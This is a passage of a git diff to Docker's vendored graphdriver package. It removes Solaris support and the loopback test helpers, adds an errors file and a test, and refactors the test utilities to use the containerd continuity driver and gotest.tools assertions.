a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go +++ /dev/null @@ -1,97 +0,0 @@ -// +build solaris,cgo - -package graphdriver - -/* -#include -#include - -static inline struct statvfs *getstatfs(char *s) { - struct statvfs *buf; - int err; - buf = (struct statvfs *)malloc(sizeof(struct statvfs)); - err = statvfs(s, buf); - return buf; -} -*/ -import "C" -import ( - "path/filepath" - "unsafe" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/mount" -) - -const ( - // FsMagicZfs filesystem id for Zfs - FsMagicZfs = FsMagic(0x2fc12fc1) -) - -var ( - // Slice of drivers that should be used in an order - priority = []string{ - "zfs", - } - - // FsNames maps filesystem id to name of the filesystem. - FsNames = map[FsMagic]string{ - FsMagicZfs: "zfs", - } -) - -// GetFSMagic returns the filesystem id given the path. -func GetFSMagic(rootpath string) (FsMagic, error) { - return 0, nil -} - -type fsChecker struct { - t FsMagic -} - -func (c *fsChecker) IsMounted(path string) bool { - m, _ := Mounted(c.t, path) - return m -} - -// NewFsChecker returns a checker configured for the provied FsMagic -func NewFsChecker(t FsMagic) Checker { - return &fsChecker{ - t: t, - } -} - -// NewDefaultChecker returns a check that parses /proc/mountinfo to check -// if the specified path is mounted. -// No-op on Solaris. -func NewDefaultChecker() Checker { - return &defaultChecker{} -} - -type defaultChecker struct { -} - -func (c *defaultChecker) IsMounted(path string) bool { - m, _ := mount.Mounted(path) - return m -} - -// Mounted checks if the given path is mounted as the fs type -//Solaris supports only ZFS for now -func Mounted(fsType FsMagic, mountPath string) (bool, error) { - - cs := C.CString(filepath.Dir(mountPath)) - buf := C.getstatfs(cs) - - // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... 
] - if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || - (buf.f_basetype[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath) - C.free(unsafe.Pointer(buf)) - return false, ErrPrerequisites - } - - C.free(unsafe.Pointer(buf)) - C.free(unsafe.Pointer(cs)) - return true, nil -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go new file mode 100644 index 0000000000..e6f973c397 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "gotest.tools/assert" +) + +func TestIsEmptyDir(t *testing.T) { + tmp, err := ioutil.TempDir("", "test-is-empty-dir") + assert.NilError(t, err) + defer os.RemoveAll(tmp) + + d := filepath.Join(tmp, "empty-dir") + err = os.Mkdir(d, 0755) + assert.NilError(t, err) + empty := isEmptyDir(d) + assert.Check(t, empty) + + d = filepath.Join(tmp, "dir-with-subdir") + err = os.MkdirAll(filepath.Join(d, "subdir"), 0755) + assert.NilError(t, err) + empty = isEmptyDir(d) + assert.Check(t, !empty) + + d = filepath.Join(tmp, "dir-with-empty-file") + err = os.Mkdir(d, 0755) + assert.NilError(t, err) + _, err = ioutil.TempFile(d, "file") + assert.NilError(t, err) + empty = isEmptyDir(d) + assert.Check(t, !empty) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go index 4a875608b0..1f2e8f071b 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go @@ -1,12 +1,10 @@ -// +build !linux,!windows,!freebsd,!solaris +// +build !linux,!windows,!freebsd -package graphdriver +package graphdriver 
// import "github.com/docker/docker/daemon/graphdriver" var ( - // Slice of drivers that should be used in an order - priority = []string{ - "unsupported", - } + // List of drivers that should be used in an order + priority = "unsupported" ) // GetFSMagic returns the filesystem id given the path. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go index ffd30c2950..856b575e75 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go @@ -1,10 +1,8 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" var ( - // Slice of drivers that should be used in order - priority = []string{ - "windowsfilter", - } + // List of drivers that should be used in order + priority = "windowsfilter" ) // GetFSMagic returns the filesystem id given the path. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go new file mode 100644 index 0000000000..96d3544552 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" + +const ( + // ErrNotSupported returned when driver is not supported. + ErrNotSupported NotSupportedError = "driver not supported" + // ErrPrerequisites returned when driver does not meet prerequisites. + ErrPrerequisites NotSupportedError = "prerequisites for driver not satisfied (wrong filesystem?)" + // ErrIncompatibleFS returned when file system is not supported. 
+ ErrIncompatibleFS NotSupportedError = "backing file system is unsupported for this graph driver" +) + +// ErrUnSupported signals that the graph-driver is not supported on the current configuration +type ErrUnSupported interface { + NotSupported() +} + +// NotSupportedError signals that the graph-driver is not supported on the current configuration +type NotSupportedError string + +func (e NotSupportedError) Error() string { + return string(e) +} + +// NotSupported signals that a graph-driver is not supported. +func (e NotSupportedError) NotSupported() {} + +// IsDriverNotSupported returns true if the error initializing +// the graph driver is a non-supported error. +func IsDriverNotSupported(err error) bool { + switch err.(type) { + case ErrUnSupported: + return true + default: + return false + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go index 20826cd7d2..e1f368508a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go @@ -1,14 +1,14 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "io" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" + "github.com/sirupsen/logrus" ) var ( @@ -18,9 +18,9 @@ var ( ) // NaiveDiffDriver takes a ProtoDriver and adds the -// capability of the Diffing methods which it may or may not -// support on its own. See the comment on the exported -// NewNaiveDiffDriver function below. +// capability of the Diffing methods on the local file system, +// which it may or may not support on its own. See the comment +// on the exported NewNaiveDiffDriver function below. // Notably, the AUFS driver doesn't need to be wrapped like this. 
type NaiveDiffDriver struct { ProtoDriver @@ -47,10 +47,11 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err startTime := time.Now() driver := gdw.ProtoDriver - layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return nil, err } + layerFs := layerRootFs.Path() defer func() { if err != nil { @@ -70,12 +71,14 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err }), nil } - parentFs, err := driver.Get(parent, "") + parentRootFs, err := driver.Get(parent, "") if err != nil { return nil, err } defer driver.Put(parent) + parentFs := parentRootFs.Path() + changes, err := archive.ChangesDirs(layerFs, parentFs) if err != nil { return nil, err @@ -94,7 +97,7 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err // are extracted from tar's with full second precision on modified time. // We need this hack here to make sure calls within same second receive // correct result. 
- time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now())) + time.Sleep(time.Until(startTime.Truncate(time.Second).Add(time.Second))) return err }), nil } @@ -104,20 +107,22 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) { driver := gdw.ProtoDriver - layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return nil, err } defer driver.Put(id) + layerFs := layerRootFs.Path() parentFs := "" if parent != "" { - parentFs, err = driver.Get(parent, "") + parentRootFs, err := driver.Get(parent, "") if err != nil { return nil, err } defer driver.Put(parent) + parentFs = parentRootFs.Path() } return archive.ChangesDirs(layerFs, parentFs) @@ -130,12 +135,13 @@ func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size i driver := gdw.ProtoDriver // Mount the root filesystem so we can apply the diff/layer. 
- layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return } defer driver.Put(id) + layerFs := layerRootFs.Path() options := &archive.TarOptions{UIDMaps: gdw.uidMaps, GIDMaps: gdw.gidMaps} start := time.Now().UTC() @@ -165,5 +171,5 @@ func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error) } defer driver.Put(id) - return archive.ChangesSize(layerFs, changes), nil + return archive.ChangesSize(layerFs.Path(), changes), nil } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go index def822b9a1..22de8d1781 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go @@ -1,15 +1,15 @@ // +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( - "bytes" "io" "io/ioutil" - "path/filepath" "testing" + contdriver "github.com/containerd/continuity/driver" "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" ) // DriverBenchExists benchmarks calls to exist @@ -245,15 +245,13 @@ func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, d for i := 0; i < b.N; i++ { // Read content - c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt")) + c, err := contdriver.ReadFile(root, root.Join(root.Path(), "testfile.txt")) if err != nil { b.Fatal(err) } b.StopTimer() - if bytes.Compare(c, content) != 0 { - b.Fatalf("Wrong content in file %v, expected %v", c, content) - } + assert.DeepEqual(b, content, c) b.StartTimer() } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go index 6e952de78b..e83d0bb2ad 100644 --- 
a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go @@ -1,6 +1,6 @@ -// +build linux freebsd solaris +// +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( "bytes" @@ -9,13 +9,16 @@ import ( "os" "path" "reflect" - "syscall" "testing" "unsafe" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/quota" "github.com/docker/docker/pkg/stringid" "github.com/docker/go-units" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -33,18 +36,13 @@ type Driver struct { func newDriver(t testing.TB, name string, options []string) *Driver { root, err := ioutil.TempDir("", "docker-graphtest-") - if err != nil { - t.Fatal(err) - } - - if err := os.MkdirAll(root, 0755); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, os.MkdirAll(root, 0755)) d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root}) if err != nil { t.Logf("graphdriver: %v\n", err) - if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS { + if graphdriver.IsDriverNotSupported(err) { t.Skipf("Driver %s not supported", name) } t.Fatal(err) @@ -86,14 +84,11 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str driver := GetDriver(t, drivername, driverOptions...) 
defer PutDriver(t) - if err := driver.Create("empty", "", nil); err != nil { - t.Fatal(err) - } + err := driver.Create("empty", "", nil) + assert.NilError(t, err) defer func() { - if err := driver.Remove("empty"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("empty")) }() if !driver.Exists("empty") { @@ -101,21 +96,14 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str } dir, err := driver.Get("empty", "") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - verifyFile(t, dir, 0755|os.ModeDir, 0, 0) + verifyFile(t, dir.Path(), 0755|os.ModeDir, 0, 0) // Verify that the directory is empty - fis, err := readDir(dir) - if err != nil { - t.Fatal(err) - } - - if len(fis) != 0 { - t.Fatal("New directory not empty") - } + fis, err := readDir(dir, dir.Path()) + assert.NilError(t, err) + assert.Check(t, is.Len(fis, 0)) driver.Put("empty") } @@ -127,9 +115,7 @@ func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...stri createBase(t, driver, "Base") defer func() { - if err := driver.Remove("Base"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Base")) }() verifyBase(t, driver, "Base") } @@ -140,21 +126,14 @@ func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...stri defer PutDriver(t) createBase(t, driver, "Base") - defer func() { - if err := driver.Remove("Base"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Base")) }() - if err := driver.Create("Snap", "Base", nil); err != nil { - t.Fatal(err) - } - + err := driver.Create("Snap", "Base", nil) + assert.NilError(t, err) defer func() { - if err := driver.Remove("Snap"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Snap")) }() verifyBase(t, driver, "Snap") @@ -332,7 +311,7 @@ func writeRandomFile(path string, size uint64) error { } // DriverTestSetQuota Create a driver and test setting quota. 
-func DriverTestSetQuota(t *testing.T, drivername string) { +func DriverTestSetQuota(t *testing.T, drivername string, required bool) { driver := GetDriver(t, drivername) defer PutDriver(t) @@ -340,19 +319,34 @@ func DriverTestSetQuota(t *testing.T, drivername string) { createOpts := &graphdriver.CreateOpts{} createOpts.StorageOpt = make(map[string]string, 1) createOpts.StorageOpt["size"] = "50M" - if err := driver.Create("zfsTest", "Base", createOpts); err != nil { + layerName := drivername + "Test" + if err := driver.CreateReadWrite(layerName, "Base", createOpts); err == quota.ErrQuotaNotSupported && !required { + t.Skipf("Quota not supported on underlying filesystem: %v", err) + } else if err != nil { t.Fatal(err) } - mountPath, err := driver.Get("zfsTest", "") + mountPath, err := driver.Get(layerName, "") if err != nil { t.Fatal(err) } quota := uint64(50 * units.MiB) - err = writeRandomFile(path.Join(mountPath, "file"), quota*2) - if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT { - t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err) + + // Try to write a file smaller than quota, and ensure it works + err = writeRandomFile(path.Join(mountPath.Path(), "smallfile"), quota/2) + if err != nil { + t.Fatal(err) } + defer os.Remove(path.Join(mountPath.Path(), "smallfile")) + // Try to write a file bigger than quota. 
We've already filled up half the quota, so hitting the limit should be easy + err = writeRandomFile(path.Join(mountPath.Path(), "bigfile"), quota) + if err == nil { + t.Fatalf("expected write to fail(), instead had success") + } + if pathError, ok := err.(*os.PathError); ok && pathError.Err != unix.EDQUOT && pathError.Err != unix.ENOSPC { + os.Remove(path.Join(mountPath.Path(), "bigfile")) + t.Fatalf("expect write() to fail with %v or %v, got %v", unix.EDQUOT, unix.ENOSPC, pathError.Err) + } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go index a50c5211e3..c6a03f341e 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go @@ -1 +1 @@ -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go index 35bf6d17ba..258aba7002 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go @@ -1,14 +1,13 @@ -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( "bytes" "fmt" - "io/ioutil" "math/rand" "os" - "path" "sort" + "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/stringid" @@ -36,17 +35,17 @@ func addFiles(drv graphdriver.Driver, layer string, seed int64) error { } defer drv.Put(layer) - if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), 
"file-a"), randomContent(64, seed), 0755); err != nil { return err } - if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil { + if err := root.MkdirAll(root.Join(root.Path(), "dir-b"), 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { return err } - return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755) + return driver.WriteFile(root, root.Join(root.Path(), "file-c"), randomContent(128*128, seed+2), 0755) } func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error { @@ -56,12 +55,12 @@ func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) e } defer drv.Put(layer) - fileContent, err := ioutil.ReadFile(path.Join(root, filename)) + fileContent, err := driver.ReadFile(root, root.Join(root.Path(), filename)) if err != nil { return err } - if bytes.Compare(fileContent, content) != 0 { + if !bytes.Equal(fileContent, content) { return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) } @@ -75,7 +74,7 @@ func addFile(drv graphdriver.Driver, layer, filename string, content []byte) err } defer drv.Put(layer) - return ioutil.WriteFile(path.Join(root, filename), content, 0755) + return driver.WriteFile(root, root.Join(root.Path(), filename), content, 0755) } func addDirectory(drv graphdriver.Driver, layer, dir string) error { @@ -85,7 +84,7 @@ func addDirectory(drv graphdriver.Driver, layer, dir string) error { } defer drv.Put(layer) - return os.MkdirAll(path.Join(root, dir), 0755) + return root.MkdirAll(root.Join(root.Path(), dir), 0755) } func removeAll(drv graphdriver.Driver, layer string, names ...string) error { @@ -96,7 +95,7 @@ func removeAll(drv graphdriver.Driver, layer string, names ...string) error { defer drv.Put(layer) for 
_, filename := range names { - if err := os.RemoveAll(path.Join(root, filename)); err != nil { + if err := root.RemoveAll(root.Join(root.Path(), filename)); err != nil { return err } } @@ -110,8 +109,8 @@ func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error { } defer drv.Put(layer) - if _, err := os.Stat(path.Join(root, filename)); err == nil { - return fmt.Errorf("file still exists: %s", path.Join(root, filename)) + if _, err := root.Stat(root.Join(root.Path(), filename)); err == nil { + return fmt.Errorf("file still exists: %s", root.Join(root.Path(), filename)) } else if !os.IsNotExist(err) { return err } @@ -127,13 +126,13 @@ func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) e defer drv.Put(layer) for i := 0; i < count; i += 100 { - dir := path.Join(root, fmt.Sprintf("directory-%d", i)) - if err := os.MkdirAll(dir, 0755); err != nil { + dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i)) + if err := root.MkdirAll(dir, 0755); err != nil { return err } for j := 0; i+j < count && j < 100; j++ { - file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) - if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil { + file := root.Join(dir, fmt.Sprintf("file-%d", i+j)) + if err := driver.WriteFile(root, file, randomContent(64, seed+int64(i+j)), 0755); err != nil { return err } } @@ -149,10 +148,10 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64 } defer drv.Put(layer) - changes := []archive.Change{} + var changes []archive.Change for i := 0; i < count; i += 100 { archiveRoot := fmt.Sprintf("/directory-%d", i) - if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil { + if err := root.MkdirAll(root.Join(root.Path(), archiveRoot), 0755); err != nil { return nil, err } for j := 0; i+j < count && j < 100; j++ { @@ -166,23 +165,23 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64 switch j % 3 { // Update 
file case 0: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) change.Kind = archive.ChangeModify - if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { return nil, err } // Add file case 1: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) change.Kind = archive.ChangeAdd - if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { return nil, err } // Remove file case 2: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) change.Kind = archive.ChangeDelete - if err := os.Remove(path.Join(root, change.Path)); err != nil { + if err := root.Remove(root.Join(root.Path(), change.Path)); err != nil { return nil, err } } @@ -201,17 +200,17 @@ func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) defer drv.Put(layer) for i := 0; i < count; i += 100 { - dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i)) for j := 0; i+j < count && j < 100; j++ { - file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) - fileContent, err := ioutil.ReadFile(file) + file := root.Join(dir, fmt.Sprintf("file-%d", i+j)) + fileContent, err := driver.ReadFile(root, file) if err != nil { return err } content := randomContent(64, seed+int64(i+j)) - if bytes.Compare(fileContent, content) != 0 { + if !bytes.Equal(fileContent, content) { return fmt.Errorf("mismatched file content 
%v, expecting %v", fileContent, content) } } @@ -254,21 +253,17 @@ func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error { } defer drv.Put(layer) - if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), "top-id"), []byte(layer), 0755); err != nil { return err } - layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) - if err := os.MkdirAll(layerDir, 0755); err != nil { + layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i)) + if err := root.MkdirAll(layerDir, 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil { - return err - } - - return nil + return driver.WriteFile(root, root.Join(layerDir, "parent-id"), []byte(parent), 0755) } func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) { @@ -295,26 +290,26 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { } defer drv.Put(layer) - layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id")) + layerIDBytes, err := driver.ReadFile(root, root.Join(root.Path(), "top-id")) if err != nil { return err } - if bytes.Compare(layerIDBytes, []byte(layer)) != 0 { + if !bytes.Equal(layerIDBytes, []byte(layer)) { return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer)) } for i := count; i > 0; i-- { - layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) + layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i)) - thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id")) + thisLayerIDBytes, err := driver.ReadFile(root, root.Join(layerDir, "layer-id")) if err != nil { return err } - if 
bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 { + if !bytes.Equal(thisLayerIDBytes, layerIDBytes) { return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes) } - layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id")) + layerIDBytes, err = driver.ReadFile(root, root.Join(layerDir, "parent-id")) if err != nil { return err } @@ -322,11 +317,11 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { return nil } -// readDir reads a directory just like ioutil.ReadDir() +// readDir reads a directory just like driver.ReadDir() // then hides specific files (currently "lost+found") // so the tests don't "see" it -func readDir(dir string) ([]os.FileInfo, error) { - a, err := ioutil.ReadDir(dir) +func readDir(r driver.Driver, dir string) ([]os.FileInfo, error) { + a, err := driver.ReadDir(r, dir) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go index 49b0c2cc35..6871dca09a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go @@ -1,143 +1,69 @@ // +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( - "fmt" - "io/ioutil" "os" - "path" "syscall" "testing" + contdriver "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -// InitLoopbacks ensures that the loopback devices are properly created within -// the system running the device mapper tests. 
-func InitLoopbacks() error { - statT, err := getBaseLoopStats() - if err != nil { - return err - } - // create at least 8 loopback files, ya, that is a good number - for i := 0; i < 8; i++ { - loopPath := fmt.Sprintf("/dev/loop%d", i) - // only create new loopback files if they don't exist - if _, err := os.Stat(loopPath); err != nil { - if mkerr := syscall.Mknod(loopPath, - uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { - return mkerr - } - os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) - } - } - return nil -} - -// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the -// loop0 device on the system. If it does not exist we assume 0,0,0660 for the -// stat data -func getBaseLoopStats() (*syscall.Stat_t, error) { - loop0, err := os.Stat("/dev/loop0") - if err != nil { - if os.IsNotExist(err) { - return &syscall.Stat_t{ - Uid: 0, - Gid: 0, - Mode: 0660, - }, nil - } - return nil, err - } - return loop0.Sys().(*syscall.Stat_t), nil -} - func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) { fi, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } - - if fi.Mode()&os.ModeType != mode&os.ModeType { - t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType) - } + assert.NilError(t, err) - if fi.Mode()&os.ModePerm != mode&os.ModePerm { - t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm) - } - - if fi.Mode()&os.ModeSticky != mode&os.ModeSticky { - t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky) - } - - if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid { - t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid) - } - - if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid { - t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid) - } + actual := fi.Mode() + assert.Check(t, 
is.Equal(mode&os.ModeType, actual&os.ModeType), path) + assert.Check(t, is.Equal(mode&os.ModePerm, actual&os.ModePerm), path) + assert.Check(t, is.Equal(mode&os.ModeSticky, actual&os.ModeSticky), path) + assert.Check(t, is.Equal(mode&os.ModeSetuid, actual&os.ModeSetuid), path) + assert.Check(t, is.Equal(mode&os.ModeSetgid, actual&os.ModeSetgid), path) if stat, ok := fi.Sys().(*syscall.Stat_t); ok { - if stat.Uid != uid { - t.Fatalf("%s no owned by uid %d", path, uid) - } - if stat.Gid != gid { - t.Fatalf("%s not owned by gid %d", path, gid) - } + assert.Check(t, is.Equal(uid, stat.Uid), path) + assert.Check(t, is.Equal(gid, stat.Gid), path) } } func createBase(t testing.TB, driver graphdriver.Driver, name string) { // We need to be able to set any perms - oldmask := syscall.Umask(0) - defer syscall.Umask(oldmask) + oldmask := unix.Umask(0) + defer unix.Umask(oldmask) - if err := driver.CreateReadWrite(name, "", nil); err != nil { - t.Fatal(err) - } + err := driver.CreateReadWrite(name, "", nil) + assert.NilError(t, err) - dir, err := driver.Get(name, "") - if err != nil { - t.Fatal(err) - } + dirFS, err := driver.Get(name, "") + assert.NilError(t, err) defer driver.Put(name) - subdir := path.Join(dir, "a subdir") - if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil { - t.Fatal(err) - } - if err := os.Chown(subdir, 1, 2); err != nil { - t.Fatal(err) - } + subdir := dirFS.Join(dirFS.Path(), "a subdir") + assert.NilError(t, dirFS.Mkdir(subdir, 0705|os.ModeSticky)) + assert.NilError(t, 